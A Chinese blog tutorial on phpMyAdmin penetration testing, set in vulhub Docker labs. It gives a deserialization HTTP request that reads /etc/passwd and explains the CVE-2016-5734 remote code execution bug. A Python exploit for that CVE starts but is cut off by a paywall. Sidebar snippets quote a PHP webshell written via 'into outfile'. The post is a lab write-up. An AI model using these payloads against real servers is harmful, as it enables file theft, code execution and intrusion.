PHPMYADMIN渗透总结

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量1.2k 收藏 8
点赞数 1
分类专栏: 安全测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_30599967/article/details/113814949
版权

phpmyadmin介绍

phpmyadmin是一个以php为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可以使用Web接口管理MySQL数据库。借由次Web接口可以成为一个简单方式输入SQL语法的较佳途径。其优势就是可以通过Web界面来远程管理方便建立、修改、删除数据库及资料表

phpmyadmin安全测试流程:

  1. 确认phpmyadmin的后台
  2. 确定版本,信息搜集
  3. 漏洞利用

实例1 WooYun-2016-199433 -phpmyadmin-反序列化-getshell

漏洞搭建

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

利用条件

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

phpmyadmin 2.x

需要登录

搭建过程

docker-compose build

docker-compose up -d

使用完成之后:docker-compose down

更多命令参考:https://www.cnblogs.com/moxiaoan/p/9299404.html

测试过程

路径:/scripts/setup.php

Exp: 读取账户信息

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

POST /scripts/setup.php HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: phpMyAdmin=jLXDJCOG0b8ynd3gpCVHrqL-3dc
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

实例2 CVE-2016-5734远程代码执行

影响版本

4.0.10.16之前4.0.x版本
4.4.15.7之前4.4.x版本
4.6.3之前4.6.x版本

php版本: 4.3.0 ~5.4.6
php 5.0 版本以上的将 preg_replace 的 /e修饰符给废弃掉了

漏洞的原理

preg_replace漏洞触发有两个前提:
01:第一个参数需要e标识符,有了它可以执行第二个参数的命令
02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令。

背景知识

preg_replace 函数执行一个正则表达式的搜索和替换

在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞

利用poc

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""

import requests
import argparse
import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True,
最低0.47元/天 解锁文章
测试zoy
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9512
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
总结分析 | 基于phpmyadmin渗透测试
小司机的奥拓
09-22 2691
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
phpMyAdmin要嵌入到已有的界面
bjx18356163055的博客
02-13 482
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1065
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用
serendipity1130的博客
09-02 924
OFF表示日志关闭C:\phpStudy\MySQL\data\stu1.log为日志绝对路径
phpmyadmin系列渗透思路连载(一)
PANDA墨森的博客
06-23 841
当拿到phpmyadin的站点后,我一般会尝试一下几种攻击手法: 1、通过弱口令进入后台,尝试into outfile写入一句话 条件:(1)有写的权限 (2)知道web绝对路径 (3)web路径可写(一般upload目录可写) show variables like '%secure%'; #如果为null就不可写,=""就可写 select '<?php eval($_POST[cmd]);?>' into outfile 'E:/www/xx/php'; #...
phpMyAdmin 安装及问题总结
10-29
今天调试PHP数据库Mysql,在单位的电脑上安装phpMyAdmin数据库管理软件,本来是很简单的事,却出现了几个问题
phpMyAdmin
08-18
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
Phpmyadmin
07-26
**phpMyAdmin** phpMyAdmin 是一个开源的、基于Web的MySQL数据库管理工具,它允许用户通过浏览器界面轻松地执行各种数据库操作,如创建、修改和删除数据库表,执行SQL查询,管理用户权限等。这款工具是用PHP编程...
phpMyAdmin.zip
05-11
总结phpMyAdmin作为一款强大的MySQL管理工具,其易用性和灵活性深受广大开发者喜爱。正确安装和使用phpMyAdmin,不仅能提升数据库管理效率,还能确保数据安全。不断学习和掌握更多使用技巧,将使你在数据库管理...
phpmyadmin CVE-2016-6617 SQL注入漏洞
A
03-19 6220
官方给出这个解决方案目前有两种,一种是升级版本(百度一下就有了),另外一种是打补丁。 版主升级版本并不能解决该漏洞,所以不抱希望的试了一下打补丁。 去吃个饭,回来在阿里云管理控制台(漏洞管理)竟然没有了。 结果还真搞定了。 补丁网址:https://github.com/phpmyadmin/phpmyadmin/commit/ceeef53 . PMA\libraries\Util...
Windows 系统下搭建 nginx php mysql phpmyadmin环境
lzunique的博客
06-20 3627
windows php nginx mysql mariadb 服务器,部署
45.网络安全渗透测试—[穷举篇8]—[phpMyAdmin登录弱口令穷举]
qwsn
01-12 4128
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、phpMyAdmin登录弱口令 1、两个工具: 2、示例:
渗透测试】--- 利用phpmyadmin来getshell
qq_43168364的博客
12-24 644
利用phpmyadmin来getshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有写文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1261
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
phpMyAdmin 渗透利用总结
anlalu233的博客
03-19 412
https://www.nps.ink/404366.html https://my.oschina.net/u/4149042/blog/4418204 https://mp.weixin.qq.com/s?__biz=MzU2MjM4NDYxOQ==&mid=2247485058&idx=1&sn=7ec6af6fb1f5f35f7d3dd027f652c5a1&scene=21#wechat_redirect https://blog.csdn.net/sinat_3.
崎岖的渗透测试
hklearner的博客
06-12 732
No One Is Secure Everything Can Be Broken !​
2020/7/13 - [GWCTF 2019]我有一个数据库 - phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
抒情诗
07-13 363
这是phpmyadmin的一个洞,没有题目的话,很难联想到这个phpmyadmin(用的太少了,还是我会的太少了) 任意文件读取的洞,下面是一篇讲解得不错的文章,分享给你。 文章目录1.扫描目录 1.扫描目录 这个 ...
记【phpMyAdmin默认安装漏洞】
初学者L_言的博客
11-11 3161
一、工具 BrupSuit kali 靶机 Metasploitable2 只要是基于php-mysql 的服务器(靶机) 一般都可尝试去查看是否存在这个漏洞 二、 /setup 目录 mysql默认安装是会产生 /phpMyAdmin 这个目录, 而这个目录下有个 /setup 目录 这个目录可以在不登入的情况下访问,并对服务器的数据库进行配置 e.g. 基于安全考虑,一般服务器在配置好数据...
phpMyAdmin使用步骤详解
"phpMyAdmin使用教程" 在学习和使用phpMyAdmin时,了解其基本操作和功能至关重要。phpMyAdmin是一款流行的开源Web应用程序,用于管理MySQL数据库,它提供了直观的图形用户界面,使得非程序员也能方便地进行数据库的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值